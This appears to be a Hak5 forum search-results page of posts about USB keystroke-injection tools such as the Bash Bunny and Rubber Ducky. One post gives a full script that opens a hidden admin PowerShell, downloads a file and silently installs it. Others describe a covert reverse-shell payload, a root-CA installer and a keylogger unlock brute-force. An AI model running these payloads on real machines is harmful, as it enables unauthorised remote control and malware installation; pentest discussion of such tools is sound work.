Hak5 Forums
Showing results for tags 'HID'.
Found 19 results

  1. [PAYLOAD] RevShellBack

    Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So... why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has finished executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo:
      • Write file (with content) to the desktop
      • Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible
      • Open calculator application
      • Message box -- powered by PowerShell
    For information about the payload, the payload script itself and how to configure it, see this GitHub repository: https://github.com/NodePoint/RevShellBack
  2. Testing the Bash Bunny for use on a physical pentest/red team engagement, but noticing a huge problem with using this device for a real world assessment. Mainly, on a Windows 7 x64 desktop, the initial driver install process took over 2 minutes. After the initial drivers are installed, my payload initializes and finishes within 10 seconds, which is great if only I didn't have to install the drivers first... What makes this issue even worse is that the Bash Bunny doesn't wait until the drivers have been installed before executing the payload, which means you need to unplug/re-plug the device after waiting 2 minutes to execute the payload. Ideally, it would be nice to build some code into the Bash Bunny to automatically detect when the drivers are installed and then run the payload. Has anyone had any issues with this, and is there any way to improve the speed here? 2 minutes is way too long to wait around at an unlocked workstation. I would be better off typing out the payload by hand if it meant only taking 20-30 seconds max.
  3. Well, I'm not gonna lie, I first saw this on another YouTube channel by the name of Seytonic, and I originally wasn't gonna show how to flash this and just demonstrate the various Ducky code to Digispark code converters that came out since his video, but I still hope you all enjoy and learn something from this video. PS: This device isn't as good as the USB Rubber Ducky, but it's still very useful and cheap enough that if you lose it you've got nothing to worry about. Click here for all links for all drivers and converters used in the video.
  4. Run admin Executable

    Hi, there is something I don't understand with the Bash Bunny... I don't know, I feel like it's too hard for my brain to understand how it works compared to the Rubber Ducky, so I need some help. I have this on a Rubber Ducky; it's pretty basic and does what I want: starting an admin PowerShell, asking for admin and THEN running my command (download a file, output that file and run it quietly):
      DELAY 1500
      GUI r
      DELAY 1000
      STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn""
      ENTER
      DELAY 1000
      ALT o
      ALT y
    So what would be the best way to do that without requiring the download, because the file will be on the Bash Bunny, either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program won't install correctly. I can't get it to open an admin PowerShell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program (time saver). Thanks a lot
  5. The HID is coming from inside the Bunny!

    Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!
  6. Hi, my problem is that when I tried:
      ATTACKMODE HID STORAGE
      DUCKY_LANG ca
      LED R B
      QUACK DELAY 1500
      LED B
      QUACK GUI r
      LED G
      QUACK DELAY 1000
      LED R FAST
      QUACK STRING Powershell -WindowStyle............insert the magic here
      QUACK ENTER
      LED R G B
    it stays blinking red fast... indefinitely. I tried a couple of things, but I don't know, is it related to my language being bad? Because in the languages I do have all the languages...
  7. Violation of CoC

    Violation of CoC
  8. Violation of CoC

    Violation of CoC
  9. Teensy or Rubber Ducky?

    I have recently found an article by Samy Kamkar regarding HID exploitation and was wondering which is better. (I understand preference, but I'm more interested in the speed and flexibility aspect of the two, as well as ease of deployment.) Also, I was wondering if there was a way to turn a Teensy into a faux Rubber Ducky, in regards to making it possible to use the Rubber Ducky coding language on a Teensy?
  10. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  11. Violation of CoC

    Violation of CoC
  12. Violation of CoC

    Violation of CoC
  13. [Payload] Rooter

    Discussion thread for the Root CA installer. (No local admin rights necessary.) Current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and working), pull request waiting. Small how-to on creating a self-signed root CA:

    Create the Root Certificate (Done Once)
    Creating the root certificate is easy and can be done quickly. Once you do these steps, you'll end up with a root SSL certificate that you'll install on all of your desktops, and a private key you'll use to sign the certificates that get installed on your various devices.

    Create the Root Key
    The first step is to create the private root key, which only takes one step. In the example below, I'm creating a 2048 bit key:
      openssl genrsa -out rootCA.key 2048
    The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3:
      openssl genrsa -des3 -out rootCA.key 2048
    You'll be prompted to give a password, and from then on you'll be challenged for the password every time you use the key. Of course, if you forget the password, you'll have to do all of this all over again. The next step is to self-sign this certificate.
      openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem
    This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit.
      You are about to be asked to enter information that will be incorporated
      into your certificate request.
      What you are about to enter is what is called a Distinguished Name or a DN.
      There are quite a few fields but you can leave some blank
      For some fields there will be a default value,
      If you enter '.', the field will be left blank.
      -----
      Country Name (2 letter code) [AU]:US
      State or Province Name (full name) [Some-State]:Oregon
      Locality Name (eg, city) []:Portland
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords
      Organizational Unit Name (eg, section) []:IT
      Common Name (eg, YOUR name) []:Data Center Overlords
      Email Address []:none@none.com
    Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that the root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  14. Violation of CoC

    Violation of CoC
  15. Is this a Vulnerability for ducky?

    So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  16. KeeLog Keyboard Logger

    First off, thank you for creating such a remarkable device! I haven't stopped playing with this since it arrived yesterday afternoon. :) I have a USB keylogger from KeeLog.com and I either forgot the password or else there is something wrong with the unit. It's been a few years since I last played with it, so I don't know what its issue is wrt the keyboard sequence. The way it works is that it passes through your keyboard to the host computer while logging the input. If you simultaneously press the secret keys, it will register the keylogger as a storage device. By default the secret keyboard sequence is KBS. Now these keys need to be pressed simultaneously and not one after the other. Therefore "QUACK STRING KBS" won't work. I copied a snippet of the Ducky script for my purposes to be able to send raw keyboard sequences. Here is a script I named "K" to send these raw sequences:
      #!/usr/bin/env python
      import sys

      def hidg_write(elements):
          # 8-byte USB HID keyboard report: modifier, reserved, up to six key codes
          values = bytearray(elements)
          # an all-zero report releases every key
          not_hold = bytearray([0, 0, 0, 0, 0, 0, 0, 0])
          hidg = open("/dev/hidg0", "wb")
          hidg.write(values)
          hidg.write(not_hold)
          hidg.close()

      # the report bytes are passed on the command line as hex values
      elements = sys.argv[1:]
      elements = [int(i, 16) for i in elements]
      hidg_write(elements)
    I then created the following NodeJS application to return every keyboard combination. The output is a valid payload.txt. The "Combinatorics.bigCombination" returns a sequence that doesn't repeat. Therefore there would only be an entry for "KBS" and not for "SBK" or "KSB", etc.
      var Combinatorics = require('js-combinatorics');
      console.log("source bunny_helpers.sh");
      console.log("ATTACKMODE HID");
      console.log("LED R");
      console.log("QUACK DELAY 5000");
      console.log("LED B 200");
      var cmb, a;
      // every 3-key combination of the HID usage codes for a..z (0x04..0x1d)
      cmb = Combinatorics.bigCombination(["04", "05", "06", "07", "08", "09", "0a", "0b", "0c", "0d", "0e", "0f", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1d"], 3);
      while (a = cmb.next()) {
          // modifier 00, reserved 00, three key codes, three unused slots
          console.log("K 00 00 " + a.join(" ") + " 00 00 00");
          console.log("Q DELAY 500");
          console.log("Q ENTER");
      }
      console.log("LED G");
    Connected to my keylogger, powered up the Bash Bunny to my attack switch, opened up a text editor to collect all of the key sequences... and while it went through each combination and correctly typed it into my editor... it didn't unlock the keylogger. :( While I'll continue with inserting additional delays, random keys, etc... I'm throwing this out here in hopes that someone may be able to see why this won't open up my keylogger. Thanks!
  17. Violation of CoC

    Violation of CoC
  18. Hey, folks. I've tried using my LAN Turtle on a few engagements now, and while it's nice to show it plugged into a computer in the report, I rarely get much love out of it, and the shell feels too slow to be useful (guess that's why it's called a LAN Turtle! - It's a really slow shell!) Anyway - The idea that I wanted to float today is whether or not it would be possible to turn the LAN Turtle into a "TwinTurtle", similar to the "TwinDuck" firmware for the USB Rubber Ducky, but in this case, the LANTurtle would continue to be a USB-to-Ethernet adapter as well as acting as a HID device, so you could have a "blind terminal" into the machine it's physically plugged into. This could allow direct exploitation of the machine through powershell meterpreter, for example - The only problem I can think of is how to tell if the device is actually unlocked before sending the commands. So the reason I'm bringing this here is that I don't currently have the know-how to write a custom firmware which implements this sort of functionality, but I wanted to bring up the idea to the community, to see if this is something that is even possible, and if there are people willing and able to implement it.
  19. Introducing the latest Composite Firmware - Codename: The Twin Duck. The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. It's multi-OS, multi-lingual and comes in three flavours:
      • c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions)
      • c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK
      • c_duck_v2_S002.hex - Triggered on Ducky's GPIO only!
    Depending on your circumstances, you may want to use either one of these available firmwares. Downloads: http://code.google.c.../downloads/list Please test and post feedback here. Snake